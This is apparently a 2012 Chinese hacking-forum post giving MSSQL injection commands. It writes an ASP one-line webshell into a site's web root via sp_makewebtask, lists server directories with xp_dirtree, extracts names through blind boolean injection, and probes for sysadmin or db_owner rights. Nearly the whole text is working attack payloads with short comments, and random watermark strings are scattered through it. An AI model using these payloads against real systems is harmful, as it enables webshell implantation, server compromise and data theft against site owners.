标题: mssql实用命令及导出一句话 [打印本页] 作者: admin 时间: 2012-9-13 17:49 标题: mssql实用命令及导出一句话 MSSQL语句导出一句话木马 & H/ {/ K9 w( {首先确定网站的WEB路径; n3 ]" D$ H9 d5 A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马 : t3 q5 D: V4 D$ x- c1 J) i. q1 z I5 }' i* _# H% W8 ^! r$ v
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- 3 p* q* a! F% t7 X; B//将一句话木马插入表中 5 a* q n7 n$ n+ ?) d! b. Y9 t) m) P' E, k$ Q
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 5 } j8 ^7 O e2 p//导出一个ASP文件3 ~( g6 O- q) V' ]0 ]/ X
9 @) v8 w+ B8 p, Y
0 ?! T6 E2 E. g1 D+ ~$ D1 O
关于MSSQL列目录1 s. \% w- ~0 Q2 o: V9 d2 B
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表, p/ D: `% _" G" Y* _1 Q$ g
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表# _. Y& ~7 D5 l) a5 e4 d1 ~
; ~3 O; R6 I1 F- p3 q) u4 q# v- Aand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录5 w v' c; i+ r# P! u$ D
1 L/ B- ]( H. u2 P
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段 " T- j7 v# P6 E4 r/ Y( F! g ) S$ X0 Y! V8 ?8 h1 a9 E9 pAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符 " k- e+ u+ N* u# v/ r6 k0 O: \7 C4 J# H
: n/ F" D1 z A
数据库版本和权限查看 & W1 B- \# Y% R* E- x3 oand 1=(select @@VERSION) //查看详细的数据库信息.3 j O9 [& e8 f" n; l! h5 ~1 F1 s8 E
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA d# R" S/ O" h eand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER( _. H4 |, F% q2 z